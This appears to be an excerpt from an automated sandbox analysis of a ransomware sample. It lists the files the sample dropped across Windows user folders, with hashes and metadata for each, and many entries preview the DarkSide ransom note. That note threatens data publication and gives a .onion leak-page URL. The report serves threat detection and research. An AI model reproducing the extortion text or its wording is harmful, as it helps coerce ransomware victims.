                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):224
                                                                                      Entropy (8bit):7.0704859487274
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:BPPEkTtpcbnYmM7E1cFw4aQmW5C8QVPbn4WEk/mxlNL5:B33tp8nVM7E1Kz5c3xQxz5
                                                                                      MD5:07E2AE220FFCB84C5D8EE4A7461F29B7
                                                                                      SHA1:F16D1AD28BB5FF13FEE295A2F8C74908A563A710
                                                                                      SHA-256:326EBC5FCCCF17C7546D1E45062D7E06653DB9640A02174E6A0BDC3BBA9FE7B9
                                                                                      SHA-512:D32E1607BD37F7D20DF79DC8D1CCCB7593D65E90771C04F4DE660C0570A85CA4DAEF1F5D703428919F6934DF72AD35BB0B2B6A4D52166D258A92D69A8CE24E1E
                                                                                      Malicious:false
                                                                                      Preview: '......*W.m....x.v.....g..........:V.H*u?..| ......[}.......w:.nK.6C2.f.3.W......8..`.XB.c..g+....3.....z.......+A9.....i.2..\..L.9"9...\Bf.q5w.Z.:.+3.hv.......i......?.!V...'Qw7..(.(.a..DI...D..x.l....~....h.Ya..
                                                                                      C:\Users\Default\AppData\Local\Microsoft\WindowsApps\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\History\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):147
                                                                                      Entropy (8bit):6.702940712124431
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:K/WR6TulDWAzALewzTaEegpCKxfqXjeM8wYkdduvqENn:K/WR6TqWOae2aEesCGfKjt8w0iEN
                                                                                      MD5:16C0DF9DBF28481841509F41E09CD06B
                                                                                      SHA1:EBF28D457E93919F0B1674059CF71FF2CC74987B
                                                                                      SHA-256:AE8EF7770A41C8F02DE986351CA2CE7BAC80C6A5730ADF3E0FAA72A30BB1D72B
                                                                                      SHA-512:DE900308B5E2120EF9C3A4D02FF59B206B810812E9474DB972CAF4B59913EB45C21F01AD2FD985A7E7C2426B5E382760BFB1964925487B9524B572743399E6C6
                                                                                      Malicious:false
                                                                                      Preview: ...).Fs.I.....V.B..@...4.'D..Y.S...S..B!.....we6x=../..l.L.g16.s..8.$)G.8..7...d.........w.n......u.9.;....)+3..r[.........3.._...o.;.p..[7. ..
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):148
                                                                                      Entropy (8bit):6.738004463528832
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HGtr9OsqDGxO9NPnS7WeAWVu0CL2KM7i+ZZNlOp7gHPV5UpJ5eIsduF4ZB:O9Os3IfIWeASpKM7i+nNlY78VukqF+B
                                                                                      MD5:7B8ABA0DC762B20DD9C6D5D32AD23271
                                                                                      SHA1:7AA22AABE4A00C15580781DBF48EE119A47E4228
                                                                                      SHA-256:527899539201C1911FC59D2028BC5428EFA934E84CA43FC278390050112A5D4D
                                                                                      SHA-512:AFA84F55D86CCEB19DAF0B84216E94A93462C9D03EF6CF766EC7AE83F4E8D9DB8C4201E0EA5D75A26E1D9C60976070362D80A69E95CE75DCD34A215D9944FB6C
                                                                                      Malicious:false
                                                                                      Preview: ..b.a7.s. ,L...k.6I...n{{..|.k.U ....9_S..3~.F^f.&;%.pK............,..eH......).0U...Tg...>.^..-../.2z.#....K.hX...aPf\.QK.Z.p.8g...a.R.....L..
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
